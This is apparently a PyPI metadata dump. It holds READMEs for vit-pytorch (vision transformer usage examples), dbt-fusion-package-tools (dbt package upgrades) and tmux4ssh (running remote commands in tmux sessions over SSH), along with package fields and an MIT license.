achieve the same results as <a href="https://arxiv.org/abs/2103.14030">Swin</a>, without the extra complexity of shifted windows, CLS tokens, nor positional embeddings. ```python import torch from vit_pytorch.twins_svt import TwinsSVT model = TwinsSVT( num_classes = 1000, # number of output classes s1_emb_dim = 64, # stage 1 - patch embedding projected dimension s1_patch_size = 4, # stage 1 - patch size for patch embedding s1_local_patch_size = 7, # stage 1 - patch size for local attention s1_global_k = 7, # stage 1 - global attention key / value reduction factor, defaults to 7 as specified in paper s1_depth = 1, # stage 1 - number of transformer blocks (local attn -> ff -> global attn -> ff) s2_emb_dim = 128, # stage 2 (same as above) s2_patch_size = 2, s2_local_patch_size = 7, s2_global_k = 7, s2_depth = 1, s3_emb_dim = 256, # stage 3 (same as above) s3_patch_size = 2, s3_local_patch_size = 7, s3_global_k = 7, s3_depth = 5, s4_emb_dim = 512, # stage 4 (same as above) s4_patch_size = 2, s4_local_patch_size = 7, s4_global_k = 7, s4_depth = 4, peg_kernel_size = 3, # positional encoding generator kernel size dropout = 0. # dropout ) img = torch.randn(1, 3, 224, 224) pred = model(img) # (1, 1000) ``` ## RegionViT <img src="./images/regionvit.png" width="400px"></img> <img src="./images/regionvit2.png" width="400px"></img> <a href="https://arxiv.org/abs/2106.02689">This paper</a> proposes to divide up the feature map into local regions, whereby the local tokens attend to each other. Each local region has its own regional token which then attends to all its local tokens, as well as other regional tokens. You can use it as follows ```python import torch from vit_pytorch.regionvit import RegionViT model = RegionViT( dim = (64, 128, 256, 512), # tuple of size 4, indicating dimension at each stage depth = (2, 2, 8, 2), # depth of the region to local transformer at each stage window_size = 7, # window size, which should be either 7 or 14 num_classes = 1000, # number of output classes tokenize_local_3_conv = False, # whether to use a 3 layer convolution to encode the local tokens from the image. the paper uses this for the smaller models, but uses only 1 conv (set to False) for the larger models use_peg = False, # whether to use positional generating module. they used this for object detection for a boost in performance ) img = torch.randn(1, 3, 224, 224) pred = model(img) # (1, 1000) ``` ## CrossFormer <img src="./images/crossformer.png" width="400px"></img> <img src="./images/crossformer2.png" width="400px"></img> This <a href="https://arxiv.org/abs/2108.00154">paper</a> beats PVT and Swin using alternating local and global attention. The global attention is done across the windowing dimension for reduced complexity, much like the scheme used for axial attention. They also have cross-scale embedding layer, which they shown to be a generic layer that can improve all vision transformers. Dynamic relative positional bias was also formulated to allow the net to generalize to images of greater resolution. ```python import torch from vit_pytorch.crossformer import CrossFormer model = CrossFormer( num_classes = 1000, # number of output classes dim = (64, 128, 256, 512), # dimension at each stage depth = (2, 2, 8, 2), # depth of transformer at each stage global_window_size = (8, 4, 2, 1), # global window sizes at each stage local_window_size = 7, # local window size (can be customized for each stage, but in paper, held constant at 7 for all stages) ) img = torch.randn(1, 3, 224, 224) pred = model(img) # (1, 1000) ``` ## ScalableViT <img src="./images/scalable-vit-1.png" width="400px"></img> <img src="./images/scalable-vit-2.png" width="400px"></img> This Bytedance AI <a href="https://arxiv.org/abs/2203.10790">paper</a> proposes the Scalable Self Attention (SSA) and the Interactive Windowed Self Attention (IWSA) modules. The SSA alleviates the computation needed at earlier stages by reducing the key / value feature map by some factor (`reduction_factor`), while modulating the dimension of the queries and keys (`ssa_dim_key`). The IWSA performs self attention within local windows, similar to other vision transformer papers. However, they add a residual of the values, passed through a convolution of kernel size 3, which they named Local Interactive Module (LIM). They make the claim in this paper that this scheme outperforms Swin Transformer, and also demonstrate competitive performance against Crossformer. You can use it as follows (ex. ScalableViT-S) ```python import torch from vit_pytorch.scalable_vit import ScalableViT model = ScalableViT( num_classes = 1000, dim = 64, # starting model dimension. at every stage, dimension is doubled heads = (2, 4, 8, 16), # number of attention heads at each stage depth = (2, 2, 20, 2), # number of transformer blocks at each stage ssa_dim_key = (40, 40, 40, 32), # the dimension of the attention keys (and queries) for SSA. in the paper, they represented this as a scale factor on the base dimension per key (ssa_dim_key / dim_key) reduction_factor = (8, 4, 2, 1), # downsampling of the key / values in SSA. in the paper, this was represented as (reduction_factor ** -2) window_size = (64, 32, None, None), # window size of the IWSA at each stage. None means no windowing needed dropout = 0.1, # attention and feedforward dropout ) img = torch.randn(1, 3, 256, 256) preds = model(img) # (1, 1000) ``` ## SepViT <img src="./images/sep-vit.png" width="400px"></img> Another <a href="https://arxiv.org/abs/2203.15380">Bytedance AI paper</a>, it proposes a depthwise-pointwise self-attention layer that seems largely inspired by mobilenet's depthwise-separable convolution. The most interesting aspect is the reuse of the feature map from the depthwise self-attention stage as the values for the pointwise self-attention, as shown in the diagram above. I have decided to include only the version of `SepViT` with this specific self-attention layer, as the grouped attention layers are not remarkable nor novel, and the authors were not clear on how they treated the window tokens for the group self-attention layer. Besides, it seems like with `DSSA` layer alone, they were able to beat Swin. ex. SepViT-Lite ```python import torch from vit_pytorch.sep_vit import SepViT v = SepViT( num_classes = 1000, dim = 32, # dimensions of first stage, which doubles every stage (32, 64, 128, 256) for SepViT-Lite dim_head = 32, # attention head dimension heads = (1, 2, 4, 8), # number of heads per stage depth = (1, 2, 6, 2), # number of transformer blocks per stage window_size = 7, # window size of DSS Attention block dropout = 0.1 # dropout ) img = torch.randn(1, 3, 224, 224) preds = v(img) # (1, 1000) ``` ## MaxViT <img src="./images/max-vit.png" width="400px"></img> <a href="https://arxiv.org/abs/2204.01697">This paper</a> proposes a hybrid convolutional / attention network, using MBConv from the convolution side, and then block / grid axial sparse attention. They also claim this specific vision transformer is good for generative models (GANs). ex. MaxViT-S ```python import torch from vit_pytorch.max_vit import MaxViT v = MaxViT( num_classes = 1000, dim_conv_stem = 64, # dimension of the convolutional stem, would default to dimension of first layer if not specified dim = 96, # dimension of first layer, doubles every layer dim_head = 32, # dimension of attention heads, kept at 32 in paper depth = (2, 2, 5, 2), # number of MaxViT blocks per stage, which consists of MBConv, block-like attention, grid-like attention window_size = 7, # window size for block and grids mbconv_expansion_rate = 4, # expansion rate of MBConv mbconv_shrinkage_rate = 0.25, # shrinkage rate of squeeze-excitation in MBConv dropout = 0.1 # dropout ) img = torch.randn(2, 3, 224, 224) preds = v(img) # (2, 1000) ``` ## NesT <img src="./images/nest.png" width="400px"></img> This <a href="https://arxiv.org/abs/2105.12723">paper</a> decided to process the image in hierarchical stages, with attention only within tokens of local blocks, which aggregate as it moves up the hierarchy. The aggregation is done in the image plane, and contains a convolution and subsequent maxpool to allow it to pass information across the boundary. You can use it with the following code (ex. NesT-T) ```python import torch from vit_pytorch.nest import NesT nest = NesT( image_size = 224, patch_size = 4, dim = 96, heads = 3, num_hierarchies = 3, # number of hierarchies block_repeats = (2, 2, 8), # the number of transformer blocks at each hierarchy, starting from the bottom num_classes = 1000 ) img = torch.randn(1, 3, 224, 224) pred = nest(img) # (1, 1000) ``` ## MobileViT <img src="./images/mbvit.png" width="400px"></img> This <a href="https://arxiv.org/abs/2110.02178">paper</a> introduce MobileViT, a light-weight and general purpose vision transformer for mobile devices. MobileViT presents a different perspective for the global processing of information with transformers. You can use it with the following code (ex. mobilevit_xs) ```python import torch from vit_pytorch.mobile_vit import MobileViT mbvit_xs = MobileViT( image_size = (256, 256), dims = [96, 120, 144], channels = [16, 32, 48, 48, 64, 64, 80, 80, 96, 96, 384], num_classes = 1000 ) img = torch.randn(1, 3, 256, 256) pred = mbvit_xs(img) # (1, 1000) ``` ## XCiT <img src="./images/xcit.png" width="400px"></img> This <a href="https://arxiv.org/abs/2106.09681">paper</a> introduces the cross covariance attention (abbreviated XCA). One can think of it as doing attention across the features dimension rather than the spatial one (another perspective would be a dynamic 1x1 convolution, the kernel being attention map defined by spatial correlations). Technically, this amounts to simply transposing the query, key, values before executing cosine similarity attention with learned temperature. ```python import torch from vit_pytorch.xcit import XCiT v = XCiT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 12, # depth of xcit transformer cls_depth = 2, # depth of cross attention of CLS tokens to patch, attention pool at end heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1, layer_dropout = 0.05, # randomly dropout 5% of the layers local_patch_kernel_size = 3 # kernel size of the local patch interaction module (depthwise convs) ) img = torch.randn(1, 3, 256, 256) preds = v(img) # (1, 1000) ``` ## Simple Masked Image Modeling <img src="./images/simmim.png" width="400px"/> This <a href="https://arxiv.org/abs/2111.09886">paper</a> proposes a simple masked image modeling (SimMIM) scheme, using only a linear projection off the masked tokens into pixel space followed by an L1 loss with the pixel values of the masked patches. Results are competitive with other more complicated approaches. You can use this as follows ```python import torch from vit_pytorch import ViT from vit_pytorch.simmim import SimMIM v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048 ) mim = SimMIM( encoder = v, masking_ratio = 0.5 # they found 50% to yield the best results ) images = torch.randn(8, 3, 256, 256) loss = mim(images) loss.backward() # that's all! # do the above in a for loop many times with a lot of images and your vision transformer will learn torch.save(v.state_dict(), './trained-vit.pt') ``` ## Masked Autoencoder <img src="./images/mae.png" width="400px"/> A new <a href="https://arxiv.org/abs/2111.06377">Kaiming He paper</a> proposes a simple autoencoder scheme where the vision transformer attends to a set of unmasked patches, and a smaller decoder tries to reconstruct the masked pixel values. <a href="https://www.youtube.com/watch?v=LKixq2S2Pz8">DeepReader quick paper review</a> <a href="https://www.youtube.com/watch?v=Dp6iICL2dVI">AI Coffeebreak with Letitia</a> You can use it with the following code ```python import torch from vit_pytorch import ViT, MAE v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048 ) mae = MAE( encoder = v, masking_ratio = 0.75, # the paper recommended 75% masked patches decoder_dim = 512, # paper showed good results with just 512 decoder_depth = 6 # anywhere from 1 to 8 ) images = torch.randn(8, 3, 256, 256) loss = mae(images) loss.backward() # that's all! # do the above in a for loop many times with a lot of images and your vision transformer will learn # save your improved vision transformer torch.save(v.state_dict(), './trained-vit.pt') ``` ## Masked Patch Prediction Thanks to <a href="https://github.com/zankner">Zach</a>, you can train using the original masked patch prediction task presented in the paper, with the following code. ```python import torch from vit_pytorch import ViT from vit_pytorch.mpp import MPP model = ViT( image_size=256, patch_size=32, num_classes=1000, dim=1024, depth=6, heads=8, mlp_dim=2048, dropout=0.1, emb_dropout=0.1 ) mpp_trainer = MPP( transformer=model, patch_size=32, dim=1024, mask_prob=0.15, # probability of using token in masked prediction task random_patch_prob=0.30, # probability of randomly replacing a token being used for mpp replace_prob=0.50, # probability of replacing a token being used for mpp with the mask token ) opt = torch.optim.Adam(mpp_trainer.parameters(), lr=3e-4) def sample_unlabelled_images(): return torch.FloatTensor(20, 3, 256, 256).uniform_(0., 1.) for _ in range(100): images = sample_unlabelled_images() loss = mpp_trainer(images) opt.zero_grad() loss.backward() opt.step() # save your improved network torch.save(model.state_dict(), './pretrained-net.pt') ``` ## Masked Position Prediction <img src="./images/mp3.png" width="400px"></img> New <a href="https://arxiv.org/abs/2207.07611">paper</a> that introduces masked position prediction pre-training criteria. This strategy is more efficient than the Masked Autoencoder strategy and has comparable performance. ```python import torch from vit_pytorch.mp3 import ViT, MP3 v = ViT( num_classes = 1000, image_size = 256, patch_size = 8, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, dropout = 0.1, ) mp3 = MP3( vit = v, masking_ratio = 0.75 ) images = torch.randn(8, 3, 256, 256) loss = mp3(images) loss.backward() # that's all! # do the above in a for loop many times with a lot of images and your vision transformer will learn # save your improved vision transformer torch.save(v.state_dict(), './trained-vit.pt') ``` ## Adaptive Token Sampling <img src="./images/ats.png" width="400px"></img> This <a href="https://arxiv.org/abs/2111.15667">paper</a> proposes to use the CLS attention scores, re-weighed by the norms of the value heads, as means to discard unimportant tokens at different layers. ```python import torch from vit_pytorch.ats_vit import ViT v = ViT( image_size = 256, patch_size = 16, num_classes = 1000, dim = 1024, depth = 6, max_tokens_per_depth = (256, 128, 64, 32, 16, 8), # a tuple that denotes the maximum number of tokens that any given layer should have. if the layer has greater than this amount, it will undergo adaptive token sampling heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(4, 3, 256, 256) preds = v(img) # (4, 1000) # you can also get a list of the final sampled patch ids # a value of -1 denotes padding preds, token_ids = v(img, return_sampled_token_ids = True) # (4, 1000), (4, <=8) ``` ## Patch Merger <img src="./images/patch_merger.png" width="400px"></img> This <a href="https://arxiv.org/abs/2202.12015">paper</a> proposes a simple module (Patch Merger) for reducing the number of tokens at any layer of a vision transformer without sacrificing performance. ```python import torch from vit_pytorch.vit_with_patch_merger import ViT v = ViT( image_size = 256, patch_size = 16, num_classes = 1000, dim = 1024, depth = 12, heads = 8, patch_merge_layer = 6, # at which transformer layer to do patch merging patch_merge_num_tokens = 8, # the output number of tokens from the patch merge mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(4, 3, 256, 256) preds = v(img) # (4, 1000) ``` One can also use the `PatchMerger` module by itself ```python import torch from vit_pytorch.vit_with_patch_merger import PatchMerger merger = PatchMerger( dim = 1024, num_tokens_out = 8 # output number of tokens ) features = torch.randn(4, 256, 1024) # (batch, num tokens, dimension) out = merger(features) # (4, 8, 1024) ``` ## Vision Transformer for Small Datasets <img src="./images/vit_for_small_datasets.png" width="400px"></img> This <a href="https://arxiv.org/abs/2112.13492">paper</a> proposes a new image to patch function that incorporates shifts of the image, before normalizing and dividing the image into patches. I have found shifting to be extremely helpful in some other transformers work, so decided to include this for further explorations. It also includes the `LSA` with the learned temperature and masking out of a token's attention to itself. You can use as follows: ```python import torch from vit_pytorch.vit_for_small_dataset import ViT v = ViT( image_size = 256, patch_size = 16, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(4, 3, 256, 256) preds = v(img) # (1, 1000) ``` You can also use the `SPT` from this paper as a standalone module ```python import torch from vit_pytorch.vit_for_small_dataset import SPT spt = SPT( dim = 1024, patch_size = 16, channels = 3 ) img = torch.randn(4, 3, 256, 256) tokens = spt(img) # (4, 256, 1024) ``` ## 3D ViT By popular request, I will start extending a few of the architectures in this repository to 3D ViTs, for use with video, medical imaging, etc. You will need to pass in two additional hyperparameters: (1) the number of frames `frames` and (2) patch size along the frame dimension `frame_patch_size` For starters, 3D ViT ```python import torch from vit_pytorch.vit_3d import ViT v = ViT( image_size = 128, # image size frames = 16, # number of frames image_patch_size = 16, # image patch size frame_patch_size = 2, # frame patch size num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) video = torch.randn(4, 3, 16, 128, 128) # (batch, channels, frames, height, width) preds = v(video) # (4, 1000) ``` 3D Simple ViT ```python import torch from vit_pytorch.simple_vit_3d import SimpleViT v = SimpleViT( image_size = 128, # image size frames = 16, # number of frames image_patch_size = 16, # image patch size frame_patch_size = 2, # frame patch size num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048 ) video = torch.randn(4, 3, 16, 128, 128) # (batch, channels, frames, height, width) preds = v(video) # (4, 1000) ``` 3D version of <a href="https://github.com/lucidrains/vit-pytorch#cct">CCT</a> ```python import torch from vit_pytorch.cct_3d import CCT cct = CCT( img_size = 224, num_frames = 8, embedding_dim = 384, n_conv_layers = 2, frame_kernel_size = 3, kernel_size = 7, stride = 2, padding = 3, pooling_kernel_size = 3, pooling_stride = 2, pooling_padding = 1, num_layers = 14, num_heads = 6, mlp_ratio = 3., num_classes = 1000, positional_embedding = 'learnable' ) video = torch.randn(1, 3, 8, 224, 224) # (batch, channels, frames, height, width) pred = cct(video) ``` ## ViViT <img src="./images/vivit.png" width="350px"></img> This <a href="https://arxiv.org/abs/2103.15691">paper</a> offers 3 different types of architectures for efficient attention of videos, with the main theme being factorizing the attention across space and time. This repository includes the factorized encoder and the factorized self-attention variant. The factorized encoder variant is a spatial transformer followed by a temporal one. The factorized self-attention variant is a spatio-temporal transformer with alternating spatial and temporal self-attention layers. ```python import torch from vit_pytorch.vivit import ViT v = ViT( image_size = 128, # image size frames = 16, # number of frames image_patch_size = 16, # image patch size frame_patch_size = 2, # frame patch size num_classes = 1000, dim = 1024, spatial_depth = 6, # depth of the spatial transformer temporal_depth = 6, # depth of the temporal transformer heads = 8, mlp_dim = 2048, variant = 'factorized_encoder', # or 'factorized_self_attention' ) video = torch.randn(4, 3, 16, 128, 128) # (batch, channels, frames, height, width) preds = v(video) # (4, 1000) ``` ## Parallel ViT <img src="./images/parallel-vit.png" width="350px"></img> This <a href="https://arxiv.org/abs/2203.09795">paper</a> propose parallelizing multip
text/markdown
null
Phil Wang <lucidrains@gmail.com>
null
null
MIT License Copyright (c) 2020 Phil Wang Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
artificial intelligence, attention mechanism, image recognition
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Topic :: Scientific/Engineering :: Artificial Intelligence", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.8", "P...
[]
null
null
>=3.8
[]
[]
[]
[ "einops>=0.8.2", "torch>=2.4", "torchvision", "pytest; extra == \"test\"", "torch==2.4.0; extra == \"test\"", "torchvision==0.19.0; extra == \"test\"" ]
[]
[]
[]
[ "Homepage, https://codeberg.org/lucidrains/vit-pytorch", "Repository, https://codeberg.org/lucidrains/vit-pytorch" ]
uv/0.8.13
2026-02-19T22:11:02.432579
vit_pytorch-1.18.0.tar.gz
138,768
0a/98/dc23c54fc996a5d127b989b9bbe426058ed27f7d76f0e40714f2cd991017/vit_pytorch-1.18.0.tar.gz
source
sdist
null
false
1641fd309561f36d57107ff9e9f5d672
62c4e92af02bc0564ebc5823f941a4ef17496c93be65d84b9d155f6aeb13dd4f
0a98dc23c54fc996a5d127b989b9bbe426058ed27f7d76f0e40714f2cd991017
null
[ "LICENSE" ]
767
2.4
dbt-fusion-package-tools
0.20.0
Add your description here
# Package Management This directory contains code used by the `packages` option in the CLI that upgrades packages in a project to a Fusion-compatible version. The code is centered on four classes: * DbtPackageFile: represents a file (currently packages.yml or dependencies.yml) that contains package dependencies for a project * DbtPackage: represents a package that is installed as a dependency for the project * DbtPackageVersion: represents a specific version of a package * DbtPackageTextFile: contains the raw lines of text from package dependency files. This is used when upgrading packages so we can replace just the version strings within a file without affecting the rest of the file layout (such as comments). ## How the CLI works The `packages` command calls the `upgrade_packages` function in `main.py`. This then calls: * `generate_package_dependencies`: extracts dependencies from project's packages.yml/dependencies.yml file and identifies installed package versions in `dbt_packages` * Returns `DbtPackageFile` if a packages.yml/dependencies.yml file is found and specifies at least one package; otherwise, None * `check_for_package_upgrades`: traverses the dependencies in `DbtPackageFile` and for each package, determines if the current installed versions is Fusion compatible; if not, it looks for any Fusion-compatible versions of the package * Returns list of `PackageVersionUpgradeResult` * Length should exactly match the number of packages in the `DbtPackageFile`'s dependencies * `upgrade_package_versions`: takes the `PackageVersionUpgradeResult` list and if any packages need updates, it identifies the required changes in packages.yml. For a dry run, it prints out the new packages.yml; otherwise, it actually makes the changes in the file. * Returns a single `PackageUpgradeResult` * `print_to_console` on the `PackageUpgradeResult` `upgrade_packages` will generate an error if: * the path specified in `--path` does not exist or isn't a directory * `generate_package_dependencies` can't find a packages.yml or dependencies.yml * `generate_package_dependencies` found a packages.yml or dependencies.yml but it didn't contain any package dependencies ## Scripts * Used to extract info used in package upgrade CLI: * `get_package_hub_files.py`: download package information from package hub (hub.getdbt.com) for all versions of all packages * Output: `package_output.json` * `get_fusion_compatible_versions.py`: loads `package_output.json` and summarizes Fusion compatibility across all versions for each package * Output: `fusion_version_compatibility_output.json` and `fusion_version_compatibility_output.py` * Not used as an input to the package upgrade CLI: * `packages_with_fusion_compatibility_changes.py`: reads `fusion_version_compatibility_output.py` and generates a CSV summary of packages for analytics use * Output: `packages.csv` `get_package_hub_files.py` and `get_fusion_compatible_version.py` are used to pull data from the public package registry (hub.getdbt.com) and extract Fusion compatibility information from available versions. This is basically a local cache of package information to bootstrap autofix. We need to know the lower bound of Fusion-compatible versions for a package but we also know that older versions of packages will not change, so caching this locally removes a lot of repetitive network calls and text parsing. Which means faster run times and fewer failures due to network issues. The output from these two scripts produces `fusion_version_compatibility_output.py` that contains a single constant, `FUSION_VERSION_COMPATIBILITY_OUTPUT`. This is then used in `DbtPackage`'s `merge_fusion_compatibility_output` to populate compatible versions. ## TODO * Private packages * Check require_dbt_version in installed private packages * Need a way to match the dependency in packages.yml (since it doesn't have the name which is used for public packages) * Match the version specifier type when upgrading packages * Currently if the package config specifies a version like ">1.0.1" and we need to upgrade to 1.0.2, it gets replaced with "1.0.2" * Should instead replace with same format like ">1.0.2" * Get latest versions from package hub instead of using cache * Better handling for version in package's dbt_project.yml * Sometimes the version number in the package's dbt_project.yml doesn't actually match the release version because package hub only checks the release tag on Github, so the installed version check will set an incorrect version * Added logic in DbtPackageFile will override the installed version if it's less than the config's version range, but this isn't 100% reliable * Could instead refer to the package lock file to find the exact version * But probably not a huge problem since we are only looking for the require dbt version anyway and only look for upgrades if it's missing/incompatible * Move package parsing logic to hubcap or package hub where appropriate * Explicit overrides at version level * Currently in scripts/get_fusion_compatible_versions and DbtPackageVersion.is_version_explicitly_disallowed_on_fusion, but should refine logic
text/markdown
null
null
null
null
null
null
[]
[]
null
null
<3.14,>=3.10
[]
[]
[]
[ "click<9.0,>=8.2.0", "dbt-protos>=1.0.410", "mashumaro<3.15,>=3.9", "pyyaml>=6.0.2; python_version >= \"3.13\"", "pyyaml>=6.0; python_version < \"3.13\"", "requests<3.0.0", "rich>=14.0.0", "typer>=0.16.0" ]
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:10:40.622556
dbt_fusion_package_tools-0.20.0.tar.gz
45,239
5f/88/0aeaaea9c23abdcc661d66123c1413d13ee45d1f7257580eaa915cb04524/dbt_fusion_package_tools-0.20.0.tar.gz
source
sdist
null
false
79c9bc86707d177b0ac76f02f96cd2c0
c8501d88d1de11b8799de8b7d0aec2926e445321c327631d7f5f607aa9f1b7e6
5f880aeaaea9c23abdcc661d66123c1413d13ee45d1f7257580eaa915cb04524
null
[]
758
2.4
tmux4ssh
0.1.0
Execute remote commands via SSH in tmux sessions with real-time output streaming
# tmux4ssh Execute remote commands via SSH in tmux sessions with real-time output streaming and batch mode. The purpose of this project is to facilitate long-running simulations, such as Spectre, on a remote Linux server under unstable internet connections, when the user does not have root access to the server and relies on specialized CAD software such as Cadence Spectre. ## Features - **Real-time output streaming** - See command output as it happens - **Tmux-based execution** - Commands run in persistent tmux sessions - **Concurrent execution** - Run multiple commands in parallel with `--new` - **Auto-new session** - Automatically creates new session if command already running (default: on) - **Directory inheritance** - `--new` sessions inherit current directory from default session - **Auto-cleanup** - `--new` sessions automatically terminate when commands complete - **Running command detection** - Prevents accidental command conflicts - **Session management** - List running commands, attach/reattach to sessions, cleanup idle sessions - **Permanent log storage** - Timestamped logs preserved in `~/tmux_ssh_logs/` - **Credential management** - Securely stores SSH credentials in system keyring - **Timeout support** - Configurable idle (default: 1 hour) and total timeouts - **Server change detection** - Warns when load-balanced hostname resolves to different server ## Why tmux4ssh? Standard SSH has limitations for long-running or critical remote tasks: | Scenario | Standard SSH | tmux4ssh | |----------|--------------|----------| | Internet drops mid-command | Command killed (SIGHUP) | Command keeps running in tmux | | Check progress after disconnect | Not possible | `tmux4ssh --attach` | | Run concurrent commands | Manual session management | `tmux4ssh --new` | | Stream output to local terminal | Works, but lost on disconnect | Persistent logs + reattach | **The manual workaround** without tmux4ssh: ```bash ssh -t user@host # Interactive login tmux new -s mysession # Create tmux session ./long_running_script.sh # Run command # Ctrl+B, D to detach # ... later, after reconnecting ... ssh -t user@host tmux attach -t mysession # Hope you remember the session name ``` **With tmux4ssh:** ```bash tmux4ssh "./long_running_script.sh" # Just run it # ... connection drops, reconnect later ... tmux4ssh --attach # Resume output streaming ``` ## Installation ### Option 1: Install as Package (Recommended) ```bash # Install in development mode pip install -e ".[dev]" # Install pre-commit hooks pre-commit install ``` **Requirements:** Python 3.10 or higher ### Option 2: Use Prototype Without Installation If you want to test without installing the package, use the standalone prototype script: ```bash # Navigate to prototype directory cd prototype # Run directly with Python python3 tmux_ssh.py -H myserver.com -U myuser "hostname" ``` See `prototype/README.md` for more details. ### Uninstall ```bash pip uninstall tmux4ssh ``` ## Usage ### Basic Commands ```bash # SSH-compatible syntax (recommended) tmux4ssh user@host "command" tmux4ssh user@host:2222 "command" # With custom port tmux4ssh host "command" # Uses saved username # Flag-based syntax (also supported) tmux4ssh -H myserver.com -U myuser "hostname" tmux4ssh -p 2222 -H myserver.com -U myuser "hostname" # Subsequent runs: host/user are remembered automatically tmux4ssh "ls -la" tmux4ssh "pwd" # Override saved settings when needed tmux4ssh -H otherserver.com "hostname" # Set idle timeout (exit if no output for N seconds, default: 3600) tmux4ssh -i 7200 "long_running_command" # Set total timeout tmux4ssh -t 3600 -i 1800 "very_long_command" ``` ### Command Quoting **When are quotes required?** Use quotes when your command contains: - **Shell operators**: `&&`, `||`, `;`, `|`, `>`, `<`, `>>`, `2>&1` - **Variable expansion**: `$VAR`, `$(command)`, backticks - **Wildcards**: `*`, `?`, `[...]` - **Spaces in arguments**: paths or strings with spaces ```bash # REQUIRED: Commands with shell operators tmux4ssh user@host "cmd1 && cmd2" # Chain commands tmux4ssh user@host "cmd1 || cmd2" # OR operator tmux4ssh user@host "cmd1; cmd2" # Sequential tmux4ssh user@host "cat file | grep pattern" # Pipe tmux4ssh user@host "echo hello > output.txt" # Redirect # REQUIRED: Commands with special characters tmux4ssh user@host 'echo $HOME' # Preserve $HOME for remote tmux4ssh user@host "ls *.txt" # Wildcards tmux4ssh user@host "cd '/path with spaces'" # Paths with spaces # OPTIONAL: Simple commands (quotes work but optional) tmux4ssh user@host hostname # Single word - OK tmux4ssh user@host "hostname" # Also OK tmux4ssh user@host ls -la /tmp # May fail (see note below) tmux4ssh user@host "ls -la /tmp" # Safer with quotes ``` **Note on flags starting with `-`**: Arguments like `-la` may be interpreted as tmux4ssh flags. Always quote commands with such arguments: ```bash # Problematic: -la might be parsed as a flag tmux4ssh user@host ls -la # Safe: Quote the entire command tmux4ssh user@host "ls -la" ``` **Best practice**: Always quote your command string to avoid surprises. ### Saved Settings tmux4ssh automatically saves your connection settings to `~/.tmux_ssh_config`: - **Host** (`-H`): Remote hostname - **User** (`-U`): SSH username - **Port** (`-p`): SSH port (default: 22) - **Last server**: Actual server hostname (for load-balancer detection) - **Auto-new setting**: Whether to auto-create sessions This means you only need to specify connection details once. All subsequent commands will use the saved settings automatically. ### Concurrent Execution By default, tmux4ssh automatically creates a new session when you run a command while another is already running: ```bash # First command runs in default session tmux4ssh "command1" # Second command auto-creates new session for concurrent execution tmux4ssh "command2" # Output: [*] Session 'remote_task' is busy, creating 'task_a1b2c3d4' for concurrent execution... ``` You can also explicitly control this behavior: ```bash # Explicitly create new session (always creates fresh session) tmux4ssh --new "command" # Disable auto-new, block if session is busy tmux4ssh --no-auto "command" # Force execution (kills any running command in session) tmux4ssh --force "command" ``` ### Session Management ```bash # List all running commands/sessions tmux4ssh --list # Attach to a running session (auto-detect if only one) tmux4ssh --attach # Attach to a specific session tmux4ssh --attach task_a1b2c3d4 # Clean up idle task_* sessions (keeps remote_task) tmux4ssh --cleanup ``` When a command times out, you can resume streaming its output: ```bash # After timeout message: # [*] Idle timeout (3600s) reached. Command still running in tmux. # [*] Use 'tmux4ssh --attach' to resume streaming the output. tmux4ssh --attach ``` ### Load-Balanced Hostnames If your hostname resolves to multiple backend servers (DNS round-robin or load balancer), tmux4ssh will warn you when you connect to a different server than before: ``` [!] WARNING: Server changed! Previous server: node01.cluster.example.com Current server: node02.cluster.example.com [!] Your tmux sessions from 'node01.cluster.example.com' are NOT available on 'node02.cluster.example.com'. [*] To access previous sessions, connect directly to: node01.cluster.example.com ``` **Recommendation**: For consistent tmux session access, use specific server hostnames instead of load-balanced hostnames: ```bash # Instead of this (may connect to different servers): tmux4ssh -H cluster.example.com "command" # Use this (always same server): tmux4ssh -H node01.cluster.example.com "command" ``` ### Credential Management ```bash # Clear stored credentials tmux4ssh --clear ``` **Tip: SSH Key Authentication** Setting up SSH keys eliminates password prompts for every command: ```bash # Generate key (if you don't have one) ssh-keygen -t ed25519 # Copy public key to remote server ssh-copy-id -i ~/.ssh/id_ed25519.pub user@hostname ``` After setup, SSH/SCP commands authenticate automatically without passwords. **Tip: File Transfer with SCP** Copy files between local and remote servers: ```bash # Remote to local scp user@hostname:/remote/path/file.txt . # Local to remote scp file.txt user@hostname:/remote/path/ # Copy directory recursively scp -r user@hostname:/remote/folder ./local/ ``` ## Log Files Logs are stored on the remote server in `~/tmux_ssh_logs/`: ``` ~/tmux_ssh_logs/ ├── remote_task_20260120_100000.log # Timestamped log ├── remote_task_20260120_143022.log # Another run ├── remote_task_latest.log # Symlink to latest ├── remote_task.lock # Lock file (while running) 